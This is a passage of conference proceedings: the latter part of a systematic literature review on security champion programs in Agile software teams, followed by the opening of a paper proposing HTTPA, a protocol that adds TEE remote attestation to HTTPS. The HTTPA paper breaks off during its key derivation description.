innovation. To do this, the champion
Establishing a Security Champion
799
needs both technical and analytical skills [6]. The champion also needs necessary authority. Breakthrough is more likely if the champion is recognized as one of the organization’s experts on the current topic. Analytical skills are essential when budgeting, planning, and controlling central tasks [14]. Howell et al. proposed seven action steps that enterprise leaders can take to breed, rather than block, potential champions in their organizations: 1. Recruit and select potential champions even if they are difficult to manage. 2. Coach for skill development. Not only technical skills but also for leadership, communication and problem solving skill. 3. Mentor for career development, supporting on building network and fostering ideas. 4. Let champions volunteer for assignments that they crave. 5. Recognize innovation achievements with rewards and other recognition of achievement of results. 6. View failure as a learning opportunity and help champions learn from failure. 7. Raise the profile of champions letting them “infect others” with their passion. A security champion is not a new concept. Bostrom et al. [12] proposed “adding a security expert to every team” to improve security problems in software development. A security champion might be an active software developer that contributes to identifying and solving security issues early in their team [13]. It is suggested that requirement analyst, developers and architects can all become Security Champions, but not Product Owners and Program Managers due to their availability. However, there should be a close connection between a security champions and these roles for support and communicating importance and value of the security work to the rest of the organization [13]. A security champions program is organizational initiative that improve security-related activities by drawing in stakeholders without formal cybersecurity experience. The development teams can serve as a platform for education and advice, while the security team can operate and perform in this platform [1]. It is reported reasons to have the security champions program: – to have a focal point in the development team for further training and education; – scale the security team non-linearly within the organization; – improve individuals in term of security capacity; – increase security influence earlier in the software life cycle to build security in rather than bolt it on.
3
Methodology
The goal of a Systematic Literature Review is to find, examine and interpret relevant studies on the topic of interest [15]. To support the further research on security champion in Agile software teams, we are motivated to survey current research about security champion and find gaps in the research area. We followed the guidelines proposed by Kitchenham [16] to perform the review. The objective
800
H. Aalvik et al.
of this SLR is to reveal evidence from literature about security champions and especially to look at how to implement a security champions program. There are two rounds of literature review done to identify the relevant papers to this research. In the first round, we conducted Systematic Literature Review, and in the second round, we conduct a snowballing manual search. As successfully conducted in our previous studies [18], this review was also conducted following five steps: 1. 2. 3. 4. 5.
Identification of research Selection of primary studies Study quality assessment Data extraction and monitoring Data synthesis
3.1
The Search Protocol
At first, we agreed on the search protocol, including the choice of database, time frame and search string. Database : The databases considered were IEEE Explore, ACM Digital Library, Science Direct, Scopus, and Google Scholar, because they are all credible with good search functionalities. Databases were out ruled by checking the number of articles returned by the search string “security champion”. Because Scopus contains most of Science Direct’s database, Science Direct was excluded. Google Scholar was excluded later in the process because it did not supply the needed search functionality. Timeframe: Since the research subject is relatively new, the search period was limited to 2016-2022. Search String Development. The search string for the systematic literature review was developed using a technique suggested by Kitchenham [16]. Kitchnham recommends considering the research question from four viewpoints: 1. 2. 3. 4.
Population: papers about security champion Intervention: the context is Agile software development projects Outcomes: security Context.
Because ACM Digital Library and IEEE Explore lack TITLE-ABS capabilities, ABS had to be utilized in place of TITLE-ABS. As a result, there are two distinct search strings. After adding synonyms and experimenting with several variations, the final search string was as follows: #1 (champion*) AND (agile OR scrum OR xp OR devops OR team*) AND TITLE-ABS(security OR cybersecurity OR secure) #2 (champion*) AND (agile OR scrum OR xp OR devops OR team*) AND ABS(security OR cybersecurity OR secure))
Establishing a Security Champion
801
Inclusion and Exclusion Criteria: A study is added to the set of primary studies if it satisfies all inclusion criteria and none of the exclusion criteria. We used the following inclusion and exclusion criteria. – IC1 - studies investigating security experts, security roles or security programs in a software development project – IC2 - studies explicitly characterizing Agile as the project context – IC3 - studies adopt empirical research method – EC1 - studies not written in English – EC2 - Studies for which the full text is not available – EC3 - Secondary or tertiary studies 3.2
The Systematic Search
Fig. 1. Systematic Search Process
802
H. Aalvik et al.
The number of papers found using the search string is shown in Fig. 1. The review was conducted between September 2021 and February 2022. As shown in Fig. 1, the search process was conducted in two phases, and following by data extraction and analysis. Most of the work in the search is conducted by the first author. All paper authors met frequently to discuss the search protocol, the results of pilot search, the systematic search and data extraction. The number of selected papers after each step of the search as stated in Fig. 1. The original scope was papers from 2016 to present due to the newness of the investigated phenomenon. However, we extended the scope to papers from 2010 to 2021. After removing duplicates, we have a whole list of 358 papers. The unfiltered search was stored and preserved in EndNote for potential reanalysis. After two round of selecting papers using title, abstract and fulltext, we ended up with only seven relevant primary studies 3.3
The Adhoc Search
A adhoc review was conducted to find models and ideas that could be mapped to the security champion theories that had already been discovered. The strategy consisted of taking base in a paper already known to contain a relevant champions theory, and investigating the papers citing this paper. We used three seed papers that were given by experts in the field. Both Google Scholar and Scopus were used as databases for the search. The initial collection of studies contained 1601 papers. The selection process started by excluding papers by title and abstract. Then the full text was read, and relevant papers were included. The papers found using Google Scholar had to be reviewed before removing duplicates because it was not possible to download all the references at once. Therefore the papers from the two databases were separately examined before all the papers included due to title and abstract were gathered. Then duplicates in the two databases were removed, and papers were excluded based on the full text. The review results were four papers describing models that could be used to understand how to implement a security champion in a team. No specific time period was restricted upon the papers. In the end of the process (Sect. 3.2 and Sect. 3.3), we found 11 relevant primary studies, as shown in Table 1. 3.4
Data Extraction and Analysis
We defined the classification schema, that focuses on the category and actual activities in a security champion programs. Data from each of the selected primary studies were then systematically extracted into the classification schema,
Establishing a Security Champion
803
according to the predetermined attributes: (1) security champion definition, (2) activity category, (3) detail actions, (4) study context, (5) research method, (6) study contribution type and (7) publisher. The chosen attributes were inspired by previous mapping studies in software engineering [7,8]. Table 1. Papers Included in the Study Study Authors
Title
No. round
S1
M. Jaatun and D. Cruzes (2021) [13]
Care and Feeding for Your Security Champion
1
S2
M. Alshaikh (2020) [3]
Developing cybersecurity culture to influence employee behavior: A practice perspective
1
S3
M. Alshaikh and B. Adamson (2021) [4]
From awareness to influence: toward a 1 model for improving employees’ security behaviour
S4
J. Haney and W. Lutters (2017) [11]
The Work of Cybersecurity Advocates 1
S5
J. Haney, W. Lutters and J. Jacobs (2021) [10]
Cybersecurity Advocates: Force Multipliers in Security Behavior Change
S6
T. W. Thomas, M. Tabassum, B. Chu and H. Lipford (2018) [25]
Security During Application 1 Development: an Application Security Expert Perspective
S7
I. Ryan, U. Roedig and K. J. Stol (2021) [23]
Understanding Developer Security Archetypes
1
S8
I. Okere, J. van Niekerk and M. Carroll (2012) [19]
Assessing Information Security Culture: A Critical Analysis of Current Approaches
2
S9
J. van Niekerk, R. von Solms (2005) [27]
An holistic framework for the fostering of an information security sub-culture in organizations
2
S10
J.M. Howell (2005) [12]
The right stuff: Identifying and developing effective champions of innovation
2
S11
C.M. Shea (2021) [24]
A conceptual model to guide research 2 on the activities and effects of innovation champions
1
804
4 4.1
H. Aalvik et al.
Results RQ1 - Is There a Reportedly Consistent View on Security Champion in Agile Software Teams?
The description of the security champion role was similar in all the papers on Agile software development. The most common mentioned characteristics of security champion is shown Fig. 2. A repetitive trend shows that the champion is there to support the team, not to do all the security work themselves. The descriptions found match the general definition from the background where a champion is defined as an individual who is “(...)enthusiastically promoting the development and/or implementation of an innovation inside a corporation (...)”.
Fig. 2. Characteristics Defining the Security Champions Role in Agile Literature.
Some of the papers mention typical personality characteristics of a security champion. The most prominent characteristics are enthusiasm for their profession, a desire to be of service to others, strive towards a “better good”, excellent communication skills, the ability to develop relationships, and solid people skills [11] [10]. Another point emphasized is that a security champion does not have to be an IT specialist but might have a background in communication, marketing, or education [10]. A security champion should also present among security experts, maintain frequent training to keep up-to-date with the latest practices, methodologies and tooling to share this knowledge. A security champion should disseminate security best practices, raise and maintain continual security awareness around issues within their team and further to their organization. A security champion
Establishing a Security Champion
805
can get his or her teammate’s buy-in by communicating security issues in a way they understand, to produce secure products early in the software life cycle. 4.2
RQ2 - What Is Reported from the Software Engineering Literature About Establishing and Maintaining Security Champion Roles in Agile Software Teams?
Fig. 3. Percentage of Papers Including a Category.
Papers from both literature reviews propose concrete actions that can help explain how to establish and maintain a champions program. From primary studies, we extracted 14 possible steps (from C1 to C14) in a security champion program: (1) Manage the program, (2) define roles, (3) assess candidates, (4) recruit candidates, (5) training, (6) communication, (7) meetings, (8) control resource, (9) give feedback, (10) automate champion activities, (11) allocate time, (12) keep motivation, (13) request services, and (14) evaluate results.The percentage of papers addressing these 14 possible actions (C1 to C14) is shown in Fig. 3. The 32 (from A1 to A32) detail actions defined and reported for each of these steps are shown in Table 3. The paper S1 is a case study investigating two different companies. The companies use different actions and are therefore presented by two unique columns in the following tables, namely column S1.1, and S1.2. We observed that no studies reported cases where all the steps or all actions are adopted. Some steps are more common than others, for instance C1 stakeholder management, C4 - recruitment and C9- feedback loop management.
806
H. Aalvik et al.
Similarly, some actions are more common than others, such as A12 - Identify person with the interest, A10 - Let champions volunteer, and A17 - Educate employees, train to perform the champion role. Table 2. Description of the Categories ID
Activity
Explanation
Papers
C1
Manage stakeholders Define roles
Involvement of management and stakeholders Define the security champions role and responsibilities Asses current security status
S1, S2, S3, S8, S9, S11 S2, S3, S11
C2 C3 C4 C5 C6 C7 C8 C9 C10 C11 C12 C13
C14
4.3
Assess current situations Recruit candidates Training
The recruitment process of the security champion. Appointed vs. volunteer Training and skill development for the security champion Communication Communication between the security champions in a company Meetings Regular meetings where the security champions can get together and discuss Control resources Resources to support the champion Feedback Collecting feedback to improve security champion program Automation Automation of security champion activities Allocate Time Allocation of time for security champion tasks Maintain team Actions to keep the security champions motivation motivated Request services Services the security champion can request from the security from the security team at the organisation team Evaluate results Measure success and milestones
S8, S9 S1, S3, S8, S10, S11 S1, S2, S8, S9, S10, S11 S1, S2, S10 S1 S1, S2 S1, 23, S8, S9 S3 S1, S11 S8, S10, S11 S3
S8, S9
RQ3: Which Challenges Has Been Reported Regarding the Establishment And Maintenance of Security Champion in Agile Software Teams?
In addition to proposing a way of establishing a security champions network, some papers introduce some challenges. Most of the studies suggest that the best way to recruit champions is to have them volunteer for the role. Security champions need executive support from both the security and engineering groups. This support empowers developers to spend their time on the
Establishing a Security Champion
807
Table 3. Categorisation of Actions Found in Research Papers ID
Activity
Source
A1
Software security person as driving force
S1.1
A2
Create briefing document for the managers
S2
A3
Have stakeholders support the program within the company
S3
A4
Attain top management commitment
S8, S9
A5
Get requisite decision making authority
S11
A6
Define roles, responsibility and main skills
S2, S3
A7
Provide clear expectations about what the champion role involves
S11
A8
Asses current state, define ideal future, analyse the gap, and determine the steps needed
S9
A9
Define the specific business problem and develop strategic action plan
S8
A10 Let champions volunteer
S1.1, S1.2, S3, S11
A11 If not enough volunteers, appoint people for the role
S1.2, S11
A12 Identify person with interest
S1.1, S1.2, S3
A13 Select potential champions
S8, S10
A14 Individual skill development
S1.1
A15 Skill development performed on demand
S1.2
A16 Training in groups of max 10 employees
S2
A17 Educate employees, train to perform the champion role
S8, S9, S10, S11
A18 Training with reward system
S8
A19 Set up communication channels: Email, Slack
S1.1, S1.2, S10
A20 Set up communication channels: Monthly newsletter, internal S2 website, Yammer, Facebook A21 Bi-weekly meeting with the security champions to discuss and S1.1, S1.2 share information A22 Page with links for learning materials and list of courses and conferences
S1.1
A23 Cyber-security hub with support and materials
S2
A24 Retroperspective after 6 months
S1.1
A25 Collect feedback from the employees
S3, S8
A26 Provide feedback to the employees
S9
A27 Automate activities like onboarding and training to make the S3 program more scalable A28 Pre-allocate time for working on security
S1.1, S11
A29 Create small wins
S8
A30 Recognition and rewards in form of career development (pay increase or promotion)
S10, S11
A31 Request services like briefing on latest threats, phishing drills, S3 or tour of the security department A32 Identify metrics, measures and milestones
S8, S9
808
H. Aalvik et al.
security program and its activities, making sure that it is important and recognized by the management teams. Recognition and pritization is, however, still an issue in many organizations. However, S1 points out that it might be challenging to find enough volunteers, especially in a big company. Another difficulty is the training. There is little to no information on how a security champion is best trained and what kind of training is necessary. S1 states that traditional classroom training sessions are not always practical. Implementing a security champions program requires significant expertise, as well as continuous-time, effort, and funding [3].
5
Discussion
As seen in Table 2 multiple action for establishing and maintaining a security champion program were found and sorted into 14 program activities. In comparison to existing guideline for building a security champion program, for instance, a six-step process written in OWASP security champions playbook [5] or Howell’s seven-step framework [12], our proposal is comprehensive with detailed action list. Actions regarding management and stakeholders are extracted in almost all primary papers. It is essential to get support from managers and stakeholders to establish a security champions program successfully. This means that it is not only important to increase developers’ attention to security issues but also for organizations to develop routines and reward the security work that developers do. The security champion should have a clear expectations about what the champion role involve. Besides, Communication between champions should occur on both formal and informal channels. Letting champions volunteer is found to be an effective way in Agile team because the champion must have a security interest to fulfill the role successfully. As seen in the general results, a security champion should be enthusiastic and have a particular security interest. If an employee who does not want to become a security champion is forced to take the role, she might show little enthusiasm. It is difficult for a champion to make the team enthusiastic about security if she is not enthusiastic herself. Even though the initial objective is to explore champion roles in Agile teams, we do not find many insights in Agile contexts. Only two approaches explicitly mention agile software teams. Some papers do not mention whether the teams are agile or not. However, there are no significant discrepancies between the agile teams actions and the other approaches. Whether the security champion is affected by being in an agile team should be further investigated. This especially concerns how the championing can fit into agile methods and how to deal with the challenges mentioned in the background.
6
Conclusions
A security champions programs bridge the gap between security and development teams. Security champions has attracted significant interest from the software
Establishing a Security Champion
809
industry recently. This work presents the state-of-the-art about security champion in software development projects, including Agile teams. We found that security champions are commonly understood in literature. We discovered 14 categories and 32 different activities regarding security champion in Agile team. We also find that implementing a security champions program requires significant expertise, as well as continuous-time, effort, and funding. Despite finding multiple actions for building and maintaining security champions, we can not come up with clear recommendations to practitioners, due to the lack of details and relevancy of the reported experience. In a future work, one can conduct case studies on the role of security champions and their connections to the team, managers and other stakeholders in Agile context.
References 1. Lipner, S.: The trustworthy computing security development lifecycle. In: 20th Annual Computer Security Applications Conference, pp. 2–13 (2004). https://doi. org/10.1109/CSAC.2004.41 2. https://www.oxfordlearnersdictionaries.com/definition/american english/ innovation 3. Alshaikh, M.: Developing cybersecurity culture to influence employee behavior: a practice perspective. Comput. Secur. 98, 102003 (2020) 4. Alshaikh, M., Adamson, B.: From awareness to influence: toward a model for improving employees’ security behaviour. Personal Ubiquitous Comput. 25(2), 1– 13 (2021) 5. Antukh, A.: OWASP Security Champions Guidebook – OWASP Foundation (2017) 6. Beatty, C.A., Gordon, J.R.M.: Preaching the gospel: the evangelists of new technology. California Manage. Rev. 33(3), 73–94 (1991) 7. Berg, V., Birkeland, J., Nguyen-Duc, A., Pappas, I.O., Jaccheri, L.: Software startup engineering: a systematic mapping study. J. Syst. Softw. 144, 255–274 (2018) 8. Cico, O., Jaccheri, L., Nguyen-Duc, A., Zhang, H.: Exploring the intersection between software industry and software engineering education - a systematic mapping of software engineering trends. J. Syst. Softw. 172, 110736 (2020) 9. Gabriel, T., Furnell, S.: Selecting security champions. Comput. Fraud Secur. 2011(8), 8–12 (2011) 10. Haney, J., Lutters, W., Jacobs, J.: Cybersecurity advocates: force multipliers in security behavior change. IEEE Secur. Privacy 19(4), 54–59 (2021) 11. Haney, J.M., Lutters, W.G.: The work of cybersecurity advocates. In: Proceedings of the 2017 CHI Conference Extended Abstracts on Human Factors in Computing Systems, pp. 1663–1670 (2017) 12. Howell, J.M.: The right stuff: identifying and developing effective champions of innovation. Acad. Manage. Perspect. 19(2), 108–119 (2005) 13. Jaatun, M.G., Cruzes, D.S.: Care and feeding of your security champion. In: 2021 International Conference on Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), pp. 1–7. IEEE (2021) 14. Jenssen, J.I., Jørgensen, G.: How do corporate champions promote innovations? Int. J. Innov. Manag. 8(01), 63–86 (2004)
810
H. Aalvik et al.
15. Keele, S., et al.: Guidelines for performing systematic literature reviews in software engineering. Technical report, Technical report, Ver. 2.3 EBSE Technical Report. EBSE (2007) 16. Kitchenham, B.: Procedures for performing systematic reviews. Keele, UK, Keele University, vol. 33, pp. 1–26 (2004) 17. Morgan, G.: Riding the waves of change. Imaginization Inc (2013) 18. Nguyen-Duc, A., Cruzes, D.S., Conradi, R.: The impact of global dispersion on coordination, team performance and software quality - a systematic literature review, vol. 57, pp. 277–294 19. Okere, I., Van Niekerk, J., Carroll, M.: Assessing information security culture: a critical analysis of current approaches. In: 2012 Information Security for South Africa, pp. 1–8. IEEE (2012) 20. Oueslati, H., Rahman, M.M., ben Othmane, l.: Literature review of the challenges of developing secure software using the agile approach. In: 2015 10th International Conference on Availability, Reliability and Security, pp. 540–547 (2015) 21. Oyetoyan, T.D., Jaatun, M.G., Cruzes, D.S.: A lightweight measurement of software security skills, usage and training needs in agile teams, vol. 8, no. 1, pp. 1–27. Publisher: IGI Global 22. Riisom, K.R., Hubel, M.S., Alradhi, H.M., Nielsen, N.B., Kuusinen, K., Jabangwe, R.: Software security in agile software development: a literature review of challenges and solutions. In: Proceedings of the 19th International Conference on Agile Software Development: Companion, pp. 1–5 (2018) 23. Ryan, I., Roedig, U., Stol, K.-J.: Understanding developer security archetypes. In: 2021 IEEE/ACM 2nd International Workshop on Engineering and Cybersecurity of Critical Systems (EnCyCriS), pp. 37–40. IEEE (2021) 24. Shea, C.M.: A conceptual model to guide research on the activities and effects of innovation champions. Implementation Res. Pract. 2, 2633489521990443 (2021) 25. Thomas, T.W., Tabassum, M., Chu, B., Lipford, H.: Security during application development: An application security expert perspective. In: Proceedings of the 2018 CHI Conference on Human Factors in Computing Systems, pp. 1–12 (2018) 26. Van de Ven, A.H.: Central problems in the management of innovation. Manage. Sci. 32(5), 590–607 (1986) 27. Van Niekerk, J., Von Solms, R.: A holistic framework for the fostering of an information security sub-culture in organizations. In: Issa, vol. 1 (2005)
HTTPA: HTTPS Attestable Protocol Gordon King and Hans Wang(B) Intel Corporation, California, USA {gordon.king,hans.wang}@intel.com
Abstract. Hypertext Transfer Protocol Secure (HTTPS) protocol has become an integral part of modern Internet technology. Currently, it is the primary protocol for commercialized web applications. It can provide a fast, secure connection with a certain level of privacy and integrity, and it has become a basic assumption on most web services on the Internet. However, HTTPS alone cannot provide security assurances on request data in computing, so the computing environment remains uncertain of risks and vulnerabilities. A hardware-based trusted execution environR R Software Guard Extension (Intel SGX) ment (TEE) such as Intel R R or Intel Trust Domain Extensions (Intel TDX) provides in-memory encryption to help protect runtime computation to reduce the risk of illegal leaking or modifying private information. (Note that we use SGX as an example for illustration in the following texts.) The central concept of SGX enables computation to happen inside an enclave, a protected environment that encrypts the codes and data pertaining to a securitysensitive computation. In addition, SGX provides security assurances via remote attestation to the web client to verify, including TCB identity, vendor identity, and verification identity. Here, we propose an HTTP protocol extension, called HTTPS Attestable (HTTPA), by including a remote attestation process onto the HTTPS protocol to address the privacy and security concerns on the web and the access of trust over the Internet. With HTTPA, we can provide security assurances for verification to establish trustworthiness with web services and ensure the integrity of request handling for web users. We expect that remote attestation will become a new trend adopted to reduce the security risks of web services. We propose the HTTPA protocol to unify the web attestation and accessing Internet services in a standard and efficient way. Keywords: HTTP · HTTPA · Protocol · Attestation · Quote TEE · Secret · Key exchange · Confidential computing · Trust service
1
· TCB · · Web
Introduction
Privacy is deeply rooted in human rights as principles and protected by law. With recent hacks and breaches, more online consumers are aware of their private G. King and H. Wang—These authors contributed equally to this work. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 811–823, 2023. https://doi.org/10.1007/978-3-031-28073-3_54
812
G. King and H. Wang
data being at risk. In fact, they have no effective control over it, leading to cybersecurity anxiety which is a new norm for our time. Obviously, the demands for cybersecurity and data privacy are rising. There are many interrelated efforts to protect sensitive data at rest, in transit, and in computing. Many of them have been applied to cloud, web services, and online businesses. Hypertext Transfer Protocol Secure (HTTPS) [10,13] is widely used to secure request data in motion, but the user data may be at risk i.e. data breach if the processing code is not fully isolated from everything else including the operating system on the host machine. R SGX enclave is specifically designed for A hardware-based TEE such as Intel this concern. A remote system or users can get evidence through attestation to verify a trusted computing base (TCB) identity and state of TEE. Note that TCB includes hardware, firmware, and software to enforce security policy while TEE provides an application with secure isolation in run time on TCB. Most of the existing TEE solutions for protecting web services are very narrowly fit for addressing specific domain problems [15]. We propose a general solution to standardize attestation over HTTPS and establish multiple trusted connections to protect and manage requested data for selected HTTP [8] domains. Also, our solution leverages the current HTTPS protocol, so it does not introduce much complexity like other approaches [6]. This paper first discusses threat modeling. Then, we propose our protocol construction for attestation over HTTPS, which is called HTTPS Attestable (HTTPA). We hope this protocol can be considered a new standard in response to current Web security concerns. Lastly, we suggest that there are two operation modes to discover, including one-way HTTPA and mutual HTTPA (mHTTPA).
2
Threat Modeling
HTTPA is designed to provide assurances via remote attestation [2] and confidential computing between a client and a server under the use case of the World Wide Web (WWW) over the Internet, so the end-point user can verify the assurances to build trust. For one-way (or unilateral) HTTPA, we assume the client is trusted and the server is not trusted, so the client wants to attest the server to establish trust. The client can verify those assurances provided by the server to decide whether they want to trust to run the computing workloads on the nontrusted server or not. However, HTTPA does not provide guarantees to make the server trustful. HTTPA involves two parts: communication and computation. Regarding communication security, HTTPA inherits all the assumptions of HTTPS for secure communication, including using TLS and verifying the host identity via a certificate. Regarding computation security, HTTPA protocol requires providing further assurance status of remote attestation for the computing workloads to run inside the secure enclave, so the client can run the workloads in encrypted memory with the proved enclave and proved TCB. As such, the attack surface of the computing is the secure enclave itself, and everything outside the secure enclave is not trusted. We assume that attackers on the server end have privileged access to the system with the ability to read, write,
HTTPA
813
delete, replay and tamper with the workloads on the unencrypted memory. On the other hand, we assume software running inside the enclave is trusted if its certificate passes the client user’s verification. Furthermore, HTTPA protocol requires that software vendor identity, TCB, and quote verification provider’s identity are verifiable, so the protocol allows the client user to only trust what it agrees to trust by making its own allowed list and denied list. Also, the HTTPA provides an assurance to confirm the client’s workloads to run inside the expected enclave with expected verified software. As such, users can confirm their workloads are running inside the expected secure enclave in the remote and have the right to reject the computation when the verification result does not meet their security requirements. Running inside the secure enclave can significantly reduce the risks of user codes or data being read or modified by the attack from outside the enclave. Therefore, HTTPA can further reduce the attack surface of HTTPS from the whole host system to the secure enclave. Lastly, HTTPA provides freedom for users to determine whether they agree with the results of the assurances or not before proceeding to the computation and thus further reducing cyber-security risks.
3
Problem Statement
Currently, many software services behind a website are still vulnerable due to unsafe memory computation. Lots of in-network processing even worsen the situation by enlarging the attack surface. There is no sufficient assurance for workload computation such that most web services remain lacking in trust. We argue that the current HTTPS is not sufficient at all to build fundamental trust for users in the modern cloud computing infrastructure. The current situation of the Internet can cause people’s private information and digital assets at great risk that users fully lose control over their own data. Following the end-to-end principle, we propose an attestation-based assurance protocol at the application layer of the OSI model (or L7) to rescue. Although we cannot guarantee fully secure computation, we can provide assurances to greatly reduce risks and regain control of data for Internet users where trust is built by verifying assurances.
4
HTTPS Attestable (HTTPA) Protocol
In this section, we first describe the standard HTTPS protocol on which we build our solution to establish an initial secure channel between the web server and the client. Then, we present the HTTPA protocol by adding a new HTTP method [9] of attestation to establish multiple trusted channels. The new method unifies attestation [4,5] and web access operations together for web applications in a general way. 4.1
Standard HTTP over TLS
The primary purpose of TLS [14] is to protect web application data from unauthorized disclosure and modification when it is transmitted between the client
814
G. King and H. Wang
and the server. The HTTPS/TLS security model uses a “certificate” to ensure authenticity. The certificate is cryptographically “signed” by a trusted certificate authority (CA) [12]. It is the current standard practice for communication over the Internet,
Fig. 1. An overview of standard HTTPS (HTTP over TLS) handshake process
Figure 1 shows the HTTPS handshake mechanism. In HTTPS, the communication protocol is encrypted using TLS. It provides authentication of the server to the client as well as integrity guarantees, forward secrecy, and replay prevention. but it does not offer any of these security benefits to data that is in compute and at rest. Therefore, the request handling codes running in an untrusted environment which may expose sensitive data to attackers are not trusted. The client user cannot have enough confidence about their private information without being disclosed while the monitoring/notification processes are also running in an untrusted environment, as shown in Fig. 2a. Figure 2a shows the possible attacks if only using HTTPS to protect the request data sent by remote web users or systems. They can validate a certificate that represents the specific domain. To authorize a runtime environment is extremely difficult if not well protected by a hardware-based TEE because it is constantly changing. Therefore, the session keys, private key, and cleartext are possible to be revealed if they are handled in an untrusted environment. 4.2
Attestation over HTTPS
R SGX technology [3] is designed to provide hardware-based TEE to The Intel reduce the TCB and protect private data in computing. Smaller TCB implies
HTTPA
815
reducing more security risks because it reduces the exposure to various attacks and the surface of vulnerability. Also, it can use an attestation service to establish a trusted channel. With hardware-based TEE, an attestation mechanism can help rigorously verify the TCB integrity, confidentiality, and identity. We propose to use remote attestation as the core interface for web users or web services to establish trust as a secure trusted channel to provision secrets or sensitive information. To achieve this goal, we add a new set of HTTP methods, including HTTP preflight [1] request/response, HTTP attest request/response, HTTP trusted session request/response, to realize remote attestation which can allow web users and the web services for a trusted connection directly with the code running inside the hardware-based TEE, as shown in Fig. 2b.
(a) The Current Security Status on the Internet by using HTTPS, which Provides Untrusted but Secure Service Access. The Attacker can perform a Privileged Escalation Attack on the Server to Hack the Session. Once the Attack Obtains the Secret Session, The Attacker can Compromise the Secure Channel between the Server and the Client by using the Key to Decrypt Packets.
(b) The Possible Future Security Status on the Internet by using the Proposed HTTPA, which Provides Trusted and Secure Service Access. The Attacker cannot Easily Hack the Session Keys Inside the Secure Enclave even though it has Privileged access to the Server. Therefore, it is More Difficult for the Attacker to Compromise the Privacy and Integrity of the Client’s Data on the Server.
Fig. 2. The Proposed HTTPA protocol provides HTTP attestation methods to establish a trusted channel on top of the secure channel of HTTPS. Therefore, the HTTPA protocol significantly reduces the risks of exposing sensitive data than HTTPS does
The TLS protocol supports the modification of the existing secure channel with the new server certificate and ciphering parameter; there are some efforts on exploring the way to weave the attestation process into TLS layer [11] [7]; however, our method does not replace existing secure channel with the trusted channel. Furthermore, we can allow the creation of multiple trusted channels inside a single TLS-secure channel, as shown in Fig. 3. Figure 4 shows an overview of proposed HTTPA handshake process. The HTTPA handshake process consists of three stages: HTTP preflight request/response, HTTP attestation request/response, and HTTP trusted session request/response. HTTP preflight request/response will check whether the
816
G. King and H. Wang
Fig. 3. The proposed HTTPA supports establishing multiple trusted channels on top of the same secure channel as a scalable solution to the current internet use case
platform is attestation available, as shown in Fig. 5, has nothing to do with security, and they have no bearing on a web application. Rather, the preflight mechanism benefits servers that were developed without an awareness of HTTPA, and it functions as a sanity check between the client and the server that they are both HTTPA-aware. the following attestation request is not a simple request, for that, having preflight requests is kind of a “protection by awareness”. HTTP attestation request/response can provide a quote and quote verification features. HTTP trusted session request/response can establish a trusted session to protect HTTPA traffics in which only the verified TCB codes can see the request data. A trusted session that creates a trusted channel begins with the session key generated and ends with destroying it. The trusted session can temporarily store information related to the activities of HTTPA while connected. We describe our HTTPA protocol in terms of one-way HTTPA and mutual HTTPA (mHTTPA) in the following sections. 4.3
One-Way HTTPA
One-way HTTPA protocol is built on top of standard HTTPS. In this case, only the client validates the server to ensure that it receives data from the expected TCB and its hosting server. Our methodology is to perform the HTTP attestation handshake over the established secure channel of HTTPS. Our one-way HTTPA is described as follows. The client and server establish a secure channel if the preflight request for each domain is successful. Preflight request checks if the attestation protocol is accepted by the server for using the “ATTEST” method
HTTPA
817
Fig. 4. An overview of the proposed HTTPA protocol. The HTTPA protocol consists of three sets of HTTP methods, including HTTP Preflight Request/Response, HTTP Attest Request/Response, and HTTP Trusted Session Request/Response
Fig. 5. Following Fig. 4, we specifically show how HTTP Preflight Request/Response works in details. First, the client sends out HTTP Preflight Request to confirm whether the server has attestation capability. If the server does not have attestation capability, it responds with no content. Then the communication between the server and the client stops because the server does not have the capability to provide trusted assurances. If the server has attestation capability, it responds with OK to allow for the attestation method to proceed.
818
G. King and H. Wang
and headers. It is an “OPTIONS request”, using one HTTP request header: Access-Control-Request-Method. Following the preflight request/response, a new set of HTTP methods is proposed to handle attestation message exchange, as shown in Fig. 6. The set of HTTP methods includes HTTP attest request, HTTP attest response, HTTP trusted session request, HTTP trusted session response First, HTTP attest request is generated by the client, using three new HTTP request headers as follows: 1. Attest-Date This item contains the date and time at which the attestation quote material was generated on the client side. This is optional for the one-way HTTPA protocol. 2. Attest-session-ID A unique string identifies a session, Here it is empty/null. If we had previously connected to a TEE a few seconds ago, we could potentially resume a session and avoid a full attestation handshake to happen again. 3. Attest-Random This is a set of random bytes generated by the client for key derivation. 4. Attest-Cipher-Suites This is a list of all of the encryption algorithms that the client is willing to support. Second, the server will provide the received random bytes to the TEE once it got created and ready to accept requests. The following is the HTTP attest response, including the headers. 1. Attest-Date The date and time at which the attestation quote material was generated on the server side. 2. Attest-Quote This item contains a quote that was generated by a TCB hosting web service that will handle HTTPA requests to the domain in question. the max-age indicates how long the results of ATTEST request can be cached. 3. Attest-Pubkey This item contains a public key that was generated inside the TEE for exchanging secret keys. Its paired private key should never leave its TEE. In addition, it needs to be bound to the identity of its TCB, so the fingerprint of the public key should be carried by its TCB quote as payload, see Fig. 7. 4. Attest-Random This item contains random bytes generated by the server. This will be used later. 5. Attest-Session-Id The session id is generated by a web service running inside the TEE of the server. 6. Attest-Cipher-Suite This is an encryption algorithm picked by the server for trusted channel encryption.
HTTPA
819
Third, the client uses the received public key of TEE to wrap a secret which is the pre-session. The wrapped pre-session secret is later used for the key derivation. The web application should send the wrapped pre-session secret directly into the web service TEE because the secret can only be unwrapped by its paired private key inside the TEE of the web service. HTTP trusted session request includes the following headers: 1. Attest-Secret Contains a pre-session secret wrapped by the server-side TEE public key.
Fig. 6. Following
In the last step, HTTP trusted session response confirms the pre-session secret has been received by the server. Thus far, both server and client sides (and only those sides) have a presession secret. Each party can calculate the “trusted session keys”, which are derived from the pre-session secret and the random bytes of both parties. To create the trusted session keys, including MAC keys, encryption keys, and the IV for cipher block initialization, we need to use PRF, the “Pseudo-Random Function”, to create a “key block” where we pull data from: key_block = PRF(pre_session_secret, ‘‘trusted session keys’’, ClientAttest.random + ServerAttest.random)
820
G. King and H. Wang
